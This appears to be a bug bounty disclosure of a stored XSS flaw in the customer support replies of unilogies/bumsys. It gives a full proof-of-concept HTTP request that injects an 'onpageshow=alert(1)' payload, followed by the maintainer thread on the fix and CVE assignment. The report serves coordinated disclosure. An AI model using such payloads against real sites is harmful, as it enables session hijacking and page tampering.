Stored XSS in Customer Support in unilogies/bumsys

Valid

Reported on

Feb 22nd 2023


Description

Attacker can send xss payload in Customer Support

Proof of Concept

Request Payload:
POST /xhr/?module=customer-support&page=addCaseReply HTTP/1.1
Host: demo.bumsys.org
Cookie: __80e72166c3164cd4e1f55b5348364ee4f8bc0d12=655mqrm2v9uhktlqpke0h026d4; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: bfbfb6c2834e8b91b86a883cd6c2b4cf18d8ad65
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3828905606458425251363531674
Content-Length: 570
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/customer-support/case-list/?case_id=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseReply"

<h1>test</h1><body onpageshow=alert(1)>
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="replyMode"

Public
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="case_id"

2
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseType"

Refund Request
-----------------------------3828905606458425251363531674--


Response:
HTML Injection and XSS alert

Impact

XSS vulnerability can allow attackers to steal cookies, create keylogger, change integrity of page and etc.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
Khurshid Alam validated this vulnerability 3 months ago

@hatlesswizard, Good finding. We will fix the issue soon. Thank you

hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
hatlesswizard
3 months ago

Researcher


Can you assign a CVE please? It would be very nice

Khurshid Alam marked this as fixed in v2.0.1 with commit 927214 3 months ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability 3 months ago
Khurshid Alam
3 months ago

Maintainer


@admin, please assign a CVE.

hatlesswizard
3 months ago

Researcher


@kmkalam24 Can you please assign a CVE?

hatlesswizard
3 months ago

Researcher


Ohh sorry, texted at the same time

Ben Harvie
3 months ago

Admin


A CVE has now been assigned as requested:)

Khurshid Alam
3 months ago

Maintainer


Thank you

hatlesswizard
3 months ago

Researcher


Thanks Guys

to join this conversation